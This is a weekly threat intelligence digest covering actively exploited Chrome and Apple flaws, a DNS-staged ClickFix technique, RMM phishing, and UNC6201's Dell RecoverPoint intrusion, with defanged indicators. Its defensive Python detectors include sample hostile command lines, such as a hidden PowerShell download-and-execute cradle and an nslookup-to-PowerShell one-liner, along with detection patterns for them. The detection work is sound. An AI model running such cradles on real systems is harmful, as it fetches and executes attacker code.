Cyber Threat Intelligence Digest: Week 7

18th February 2026 - Threat Reports
  • Vulnerabilities
  • Potential Threats
  • General News
  • Threat Actor Weekly Graph
  • Global Trends Powered by Recorded Future
  • Prominent Information Security Events
  • Remediation Actions

Executive Summary - Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Google Patches Actively Exploited Vulnerability Affecting Chrome Tracked as CVE-2026-2441 - On 13 February 2026, Google patched CVE-2026-2441, a high-severity use-after-free vulnerability in Google Chrome that had been actively exploited in the wild. The flaw affects Chrome versions prior to 145.0.7632.75 and is located in the browser’s Cascading Style Sheets (CSS) component across Windows, macOS and Linux platforms. Successful exploitation enables threat actors to execute arbitrary code by means of a maliciously crafted HTML page within Chrome’s sandbox.

The issue was addressed in Chrome versions 145.0.7632.75 and 145.0.7632.76 for Windows and macOS, and 144.0.7559.75 for Linux. Google has not disclosed additional technical details regarding the exploitation in the wild, attributed the activity to any specific threat actor, or identified particular targets.

Apple Patches Actively Exploited Zero-Day CVE-2026-20700 in dyld Across Multiple Operating Systems - On 11 February 2026, Apple patched CVE-2026-20700, an actively exploited memory corruption vulnerability affecting its Dynamic Link Editor (dyld). dyld is a core system component responsible for loading and linking shared libraries at runtime across Apple operating systems. Successful exploitation allows a threat actor with the ability to modify memory to execute arbitrary code on an affected device.

The vulnerability impacts iPhone 11 and later models, iPad Pro 12.9-inch (3rd generation and later), iPad Pro 11-inch (1st generation and later), iPad Air (3rd generation and later), iPad (8th generation and later), iPad mini (5th generation and later), and Mac devices running macOS Tahoe. Apple addressed the issue with the release of iOS 26.3, iPadOS 26.3, macOS Tahoe 26.3, tvOS 26.3, watchOS 26.3 and visionOS 26.3.

Mozilla Patches Firefox Vulnerability CVE-2026-2447 in libvpx - On 16 February 2026, Mozilla patched a heap buffer overflow vulnerability in libvpx, tracked as CVE-2026-2447. The flaw affects Firefox versions prior to 147.0.4, Firefox ESR versions prior to 140.7.1 and 115.32.1, Thunderbird versions prior to 140.7.2, and Thunderbird versions prior to 147.0.2. Successful exploitation could enable threat actors to carry out memory corruption or remote code execution (RCE). At the time of writing, there have been no reports of this vulnerability being exploited in the wild.

To mitigate the risk of exploitation, Insikt Group recommends updating Firefox to version 147.0.4 or later, Firefox ESR to version 140.7.1 or 115.32.1 or later, and Thunderbird to version 140.7.2 or 147.0.2 or later.

Potential Threats

New ClickFix Technique Uses Custom DNS Queries to Stage Payload Delivery - On 13 February 2026, Microsoft Security (@msftsecurity on X, formerly Twitter) reported a new ClickFix technique that uses custom DNS queries to stage payload delivery. Targets run a Windows Command Prompt command that performs an nslookup against a hard-coded external DNS server instead of the system’s default resolver. The command extracts the “Name:” field containing a malicious PowerShell instruction, which launches a hidden PowerShell instance to download and execute a second-stage payload in memory. At the time of writing, the URL for the payload returns an error. This DNS-based method allows threat actors to blend malicious activity with normal network traffic and reduce reliance on traditional web delivery.

The second-stage payload attempts to download a ZIP archive containing a portable Python bundle and a malicious script. The script collects system and network information, including OS and hardware details, Active Directory objects, running processes, services, TCP connections and disk volumes, often outputting JSON-formatted data. It enumerates domain users and retrieves DNS configuration before establishing persistence by dropping a VBScript (script.vbs) in %APPDATA%\WPy64-31401\python\ and creating a startup shortcut (MonitoringService.lnk) to execute it automatically.

Threat Actors Embedding RMM Payloads in Zoom, Teams, and Google Meet Phishing Lures - On 12 February 2026, Netskope Threat Labs reported a phishing campaign using fake video conferencing invitations to deliver remote monitoring and management (RMM) tools. The operation targets corporate users of Zoom, Microsoft Teams and Google Meet through spoofed meeting pages hosted on typo-squatted domains such as zoom-meet[.]us. Victims are prompted to install a fraudulent software update, which downloads a digitally signed file posing as a legitimate application and deploys RMM tools including LogMeIn, Datto and ScreenConnect. Because these tools are often pre-approved, threat actors can gain persistent remote access and administrative control without raising immediate alerts.

After gaining access, threat actors use RMM features such as file transfer, remote shell access and screen sharing to exfiltrate data and identify high-value targets. Mass deployment functionality may also be abused to spread additional malware, potentially expanding a single compromise into a broader organisational breach. Netskope did not attribute the campaign or provide details on affected organisations.

Suspected China-Nexus UNC6201 Exploits CVE-2026-22769 in Dell RecoverPoint for Virtual Machines to Deploy SLAYSTYLE Web Shell and GRIMBOLT Backdoor - On 18 February 2026, Google Mandiant reported that UNC6201, a suspected China-linked threat cluster, had exploited CVE-2026-22769, a zero-day hard-coded credential vulnerability in Dell RecoverPoint for Virtual Machines (RP4VM), since mid-2024. The flaw affects RP4VM versions prior to 6.0.3.1 HF1 and allows unauthenticated root access. Compromised appliances were seen communicating with command-and-control infrastructure linked to the BRICKSTORM backdoor, which UNC6201 later replaced with a C# backdoor, GRIMBOLT. Dell confirmed limited exploitation and issued remediation guidance.

UNC6201 used hard-coded credentials in tomcat-users.xml to access the Apache Tomcat Manager interface and deploy a malicious WAR file containing the SLAYSTYLE web shell. Persistence was maintained by modifying convert_hosts.sh and using BRICKSTORM, then GRIMBOLT, which strips .NET metadata to evade detection. Post-compromise activity included creating temporary virtual network interfaces (“Ghost NICs”) on ESXi-hosted VMs to pivot internally and configuring iptables for Single Packet Authorization, monitoring port 443 for triggers and redirecting traffic to port 10443 for five-minute windows.

General News

Europe must adapt to ‘permanent’ cyber and hybrid threats - Cyber and hybrid threats are now a permanent feature of Europe’s security environment, a senior Swedish defence official said Thursday, warning that societies must operate under sustained pressure rather than assume disruptions will be rare. Lisa Gustafsson, director of foreign intelligence and cyber at the Swedish Ministry of Defence, cited Russia’s invasion of Ukraine as a turning point that normalised the combined use of military force, economic pressure, information operations and cyber activity.

Gustafsson said conflicts are increasingly below the threshold of open war, with cyber and information campaigns targeting public trust. In response, Sweden is conducting its largest rearmament since the Cold War, rebuilding civil defence, and strengthening national cybersecurity under its “total defence” concept. Civilian authorities protect essential services, the military handles defence-related cyber systems, and the National Cyber Security Centre coordinates efforts with the national computer emergency response team. She stressed collaboration with the private sector, which operates much of Sweden’s critical infrastructure, through structured information sharing and joint preparedness planning.

Microsoft Teams outage affects users in United States, Europe - Microsoft is addressing an ongoing outage affecting Microsoft Teams, causing delays and preventing some users from accessing the service. Reports on DownDetector indicate issues with joining meetings via the Teams desktop client, signing in, and using the app. According to Microsoft’s incident report TM1233974, some users in Europe and the United States may experience failures or delays when sending and receiving chat messages containing inline media such as images, videos, or code snippets. The company has classified the issue as “service degradation” and is reviewing monitoring data to identify the root cause and implement a fix.

Microsoft is also working to resolve related issues, including an incident (TM1231009) blocking some users from joining meetings via the “Join” button, and another (TM1218513) preventing users from adding or updating Copilot Studio agents in Teams. A previous outage in October 2025 affected multiple Microsoft 365 services, including Teams, and caused Multi-Factor Authentication problems for Entra SSO users. Teams is used by over 320 million people each month, according to Microsoft.

Russia tries to block WhatsApp, Telegram in communication blockade - The Russian government is attempting to block WhatsApp as part of its intensified control over communication platforms. WhatsApp called the move “a backwards step” on X, warning it will reduce safety for people in Russia, and pledged to continue efforts to keep users connected. Roskomnadzor, the country’s internet watchdog, had previously excluded whatsapp.com and web.whatsapp.com from Russia’s National DNS to combat crime and fraud, forcing users to rely on VPNs or external resolvers. Reports now indicate attempts to fully block the service; Meta, WhatsApp’s parent company, has been designated an “extremist” entity in Russia since 2022. Restrictions began in August 2025 with throttled voice and video calls, followed by attempts to block new registrations in October 2025.

Presidential press secretary Dmitry Peskov said WhatsApp could resume operations if Meta complies with local laws. The restrictions follow similar measures against Telegram, which has been throttled to encourage use of the Kremlin-controlled MAX messenger app. MAX, developed by VK and mandatory on devices sold in Russia since September 2025, is promoted as secure but has drawn criticism for weak encryption, government access, and extensive data collection. Russian users may still access alternative messengers via VPNs, though these tools are also at risk under the government’s crackdown.

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and together determine the group's severity score. These updates can be seen below.

Limited Severity Basic Severity Moderate Severity High Severity
Threat Actor Severity Increase Opportunity Intent
GRU 85  Basic Moderate ● 49 ● 60 30 30
Dragon Force Group Moderate Moderate 69 ● 68  ● 49 49
Head Mare NEW Basic NEW 35 NEW 25
GordonFreeman NEW Basic NEW 35 NEW 25
APT73 Ransomware Group Basic Basic 25 25 ● 5 ● 31

Global Trends Powered by Recorded Future

Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.

The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.

- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.

| Attackers | Methods | Vulnerabilities | Targets |
|---|---|---|---|
| PalachPro | Predator Spyware | CVE-2026-22769 | Angola |
| SERVER KILLERS | APT73 Ransomware | CVE-2026-2441 | Palantir Technologies |
| Kim Dotcom | Stealware | CVE-2026-1281 | Eurail Group |
| Space Bears Ransomware Group | Unauthorized Access | CVE-2026-1340 | Canada Goose |
| Lapsu$ Group | Social Engineering | CVE-2026-1731 | Benelux ISPs |

Prominent Information Security Events

New ClickFix Technique Uses Custom DNS Queries to Stage Payload Delivery

Source: Insikt Group | Validated Intelligence Event

IOC: Hash - 4c5d243611978d7aa0e5c17801627204ba1719dacd13a7cda6a022f6d6720275

IOC: URL - hxxp://64[.]227[.]40[.]197/o

On 13 February 2026, Microsoft Security (@msftsecurity on X, formerly Twitter) reported a new ClickFix technique using custom DNS queries to stage malware. Targets run a Windows Command Prompt command that performs an nslookup against a hard-coded external DNS server, extracting the “Name:” field containing a malicious PowerShell instruction. This launches a hidden PowerShell process that attempts to download a second-stage payload via Invoke-WebRequest and executes it in memory with Invoke-Expression (IEX). The DNS-based approach hides activity in normal network traffic and reduces reliance on traditional web delivery.

The second-stage payload retrieves a ZIP archive containing a portable Python bundle and malicious script. The script collects system and network information, enumerates users and Active Directory objects, lists TCP connections, disk volumes, running processes and services, and retrieves the current user, often formatting output in JSON for automated processing.

For persistence, the script drops a VBScript (script.vbs) in %APPDATA%\WPy64-31401\python\ and creates a startup shortcut (MonitoringService.lnk) in %STARTUP%\ to execute it at login. This ensures continued access while DNS staging and in-memory execution make detection more difficult, showing how threat actors are evading traditional security measures.
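As an added defensive example (not code from the original digest or from Microsoft's reporting), the following Python routine checks process command lines for the three indicators described in both ClickFix passages above: an nslookup call that passes an explicit server (bypassing the system resolver), extraction of the "Name:" field, and a hidden PowerShell launch. The sample command lines are constructed; 203.0.113.5 (RFC 5737) stands in for the hard-coded external resolver and placeholder.invalid for the payload URL.

```python
import re

# Constructed process command lines (not from the report). 203.0.113.5 is an RFC 5737
# address standing in for the hard-coded resolver; placeholder.invalid for the payload URL.
SAMPLE_CMDLINES = [
    "nslookup intranet.example.local",
    "nslookup -type=mx example.com",
    "cmd /c for /f \"tokens=2\" %a in ('nslookup svc.example 203.0.113.5 ^| findstr Name:') "
    "do powershell -w hidden -nop -c %a",
    "powershell -w hidden -c iex (iwr http://placeholder.invalid/o)",
]

STOP = ("|", "^", ")", "&", "'", '"')  # tokens that end an nslookup argument list in a one-liner

PATTERNS = {
    "name_field_extraction": re.compile(r"\bName:", re.I),
    "hidden_powershell": re.compile(r"powershell(?:\.exe)?\b.*?-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"\b(?:iex|invoke-expression|iwr|invoke-webrequest)\b", re.I),
}

def nslookup_explicit_server(cmdline: str) -> bool:
    """True when nslookup gets a server argument (second positional token), i.e. bypasses the system resolver."""
    toks = cmdline.split()
    for i, tok in enumerate(toks):
        if tok.lstrip("('\"").lower() != "nslookup":
            continue
        positional = []
        for nxt in toks[i + 1:]:
            if nxt.startswith(STOP):
                break
            if not nxt.startswith("-"):   # skip options such as -type=txt
                positional.append(nxt)
        if len(positional) >= 2:
            return True
    return False

def indicators(cmdline: str) -> set:
    """Set of indicator names present in one command line."""
    found = {name for name, pat in PATTERNS.items() if pat.search(cmdline)}
    if nslookup_explicit_server(cmdline):
        found.add("nslookup_explicit_server")
    return found

def is_clickfix_dns_staging(cmdline: str) -> bool:
    """Alert only when DNS is the staging channel for a hidden PowerShell launch."""
    f = indicators(cmdline)
    return "nslookup_explicit_server" in f and bool(f & {"hidden_powershell", "name_field_extraction"})
```

A hidden PowerShell launch on its own (the last sample) is noisy in many estates; the combination with a resolver override is what makes this pattern specific.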

Suspected China-Nexus UNC6201 Exploits CVE-2026-22769 in Dell RecoverPoint for Virtual Machines to Deploy SLAYSTYLE Web Shell and GRIMBOLT Backdoor

Source: Insikt Group | Validated Intelligence Event

IOC: Hash - 24a11a26a2586f4fba7bfe89df2e21a0809ad85069e442da98c37c4add369a0c

IOC: IP - 149[.]248[.]11[.]71

On 18 February 2026, Google Mandiant reported that UNC6201, a suspected China-linked threat cluster, had exploited a zero-day hard-coded credential vulnerability, CVE-2026-22769, in Dell RecoverPoint for Virtual Machines (RP4VM) since mid-2024. The vulnerability affects RP4VM versions prior to 6.0.3.1 HF1 and allows unauthenticated root access. Compromised appliances communicated with command-and-control infrastructure linked to the BRICKSTORM backdoor, which UNC6201 replaced in September 2025 with a new C# backdoor, GRIMBOLT, compiled with .NET Native Ahead-of-Time and packed with UPX. Dell confirmed limited exploitation and provided remediation guidance.

UNC6201 exploited the flaw by using hard-coded credentials in tomcat-users.xml to access the Apache Tomcat Manager interface and upload a malicious WAR file via /manager/text/deploy, deploying the SLAYSTYLE web shell for root command execution. Persistence was maintained by modifying convert_hosts.sh, which runs at boot via rc.local, while BRICKSTORM was later replaced by GRIMBOLT, which removes common intermediate language metadata to evade detection.

Post-compromise activity included creating temporary virtual network interfaces on ESXi-hosted virtual machines, or “Ghost NICs,” to pivot into internal and software-as-a-service environments. UNC6201 also configured iptables for Single Packet Authorization, monitoring port 443 for a specific hex-string trigger, allowlisting the source IP and redirecting traffic to port 10443 for five-minute windows, enabling controlled and stealthy access.
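As an added example (not from the original digest, Dell or Mandiant), two checks a defender can run on a Tomcat-based appliance against the intrusion path described in both UNC6201 passages: flag successful deploy/undeploy requests to the Manager text interface in the access log, and list accounts in tomcat-users.xml that hold Manager roles. The log lines, XML, the svcuser account, the /helper context and the addresses are constructed placeholders; the digest does not give the hard-coded credentials.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Constructed Tomcat access-log lines in combined format (not from the report).
# 198.51.100.7 / 192.0.2.20 are RFC 5737 documentation addresses.
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [18/Feb/2026:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 0 "-" "Mozilla/5.0"
198.51.100.7 - svcuser [18/Feb/2026:10:01:09 +0000] "PUT /manager/text/deploy?path=/helper&update=true HTTP/1.1" 200 45 "-" "curl/8.0"
198.51.100.7 - - [18/Feb/2026:10:02:30 +0000] "POST /helper/index.jsp HTTP/1.1" 200 512 "-" "curl/8.0"
192.0.2.20 - - [18/Feb/2026:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Constructed tomcat-users.xml; the real RP4VM credentials are not in the digest.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users>
  <role rolename="manager-script"/>
  <user username="svcuser" password="PLACEHOLDER" roles="manager-script"/>
  <user username="viewer" password="PLACEHOLDER" roles="viewer"/>
</tomcat-users>
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Manager endpoints that install or remove web applications (WAR files).
MANAGER_DEPLOY = {"/manager/text/deploy", "/manager/text/undeploy", "/manager/html/upload"}
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}

def manager_deploy_events(log_text: str) -> list:
    """Successful (2xx) deploy/undeploy requests against the Manager app, with the context path."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path in MANAGER_DEPLOY and m["status"].startswith("2"):
            hits.append({"src": m["src"], "user": m["user"], "ts": m["ts"], "method": m["method"],
                         "context": parse_qs(url.query).get("path", ["?"])[0]})
    return hits

def manager_capable_users(xml_text: str) -> list:
    """Usernames whose roles grant access to the Tomcat Manager application (namespace-agnostic)."""
    root = ET.fromstring(xml_text)
    return [u.get("username") for u in root.iter()
            if u.tag.rsplit("}", 1)[-1] == "user"
            and MANAGER_ROLES & set(u.get("roles", "").replace(" ", "").split(","))]

if __name__ == "__main__":
    print(manager_deploy_events(SAMPLE_ACCESS_LOG))
    print(manager_capable_users(SAMPLE_TOMCAT_USERS))
```

On an appliance that never legitimately deploys applications at runtime, any hit from the first check is worth an incident ticket, and any account returned by the second is a candidate for removal or rotation.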

Remediation Actions

Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable: 

  • CVE-2026-2441 (Chrome) – This vulnerability can be addressed by upgrading Chrome to versions 145.0.7632.75 and 145.0.7632.76 for Windows and macOS, and 144.0.7559.75 for Linux.

  • CVE-2026-20700 (Apple dyld) – This vulnerability can be addressed by updating to iOS 26.3, iPadOS 26.3, macOS Tahoe 26.3, tvOS 26.3, watchOS 26.3 and visionOS 26.3.

  • CVE-2026-2447 (Firefox) – This vulnerability can be addressed by patching Firefox to version 147.0.4.

If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.